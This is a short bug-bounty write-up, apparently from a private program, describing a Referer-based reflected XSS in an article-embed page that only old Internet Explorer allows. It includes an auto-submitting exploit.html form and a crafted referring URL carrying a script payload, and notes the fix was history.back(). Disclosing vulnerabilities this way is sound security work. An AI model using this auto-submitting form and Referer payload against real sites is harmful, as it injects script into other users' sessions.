Referer Based XSS


Severity : Medium

Complexity : High( Exploitable with old version of IE)

Weakness: Using Referer value is response body


  • While Testing one of the private on Hackerone . They have functionality to Embed the articles of their user’s on third party site’s.
  • While opening the article’s from third party site’s , Noticed that they have a href called “GO BACK! If it Doesn’t Load’s”
  • Checking the go back href :
<a href="http://54.147.92.2/test.html">go back</a>
and try again. If this problem persists, please
<a href="/contact">contact us</a>

  • Exploit.html
<script>document.getElementById(’xx’).submit()</script>
<form id=’xx’ name=’exploit’ method=”GET” action="https://site.com/articles/author/embed/112434/"></form>
  • When we sent http://54.147.92.2/exploit.html?<script>alert(1);</script> to the victim.
  • Referer value get’s set to http://54.147.92.2/exploit.html?<script>alert(1);</script> and by clicking on “GO BACK!” Popup will appear in IE.
  • Reason why attack work’s only on IE is Internet Explorer doesn’t filter URL Encode values . Whereas Chrome and Firefox will URL encode the values to
http://54.147.92.2/exploit.html?%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E


  • They have Fixed By using javascript:history.back() :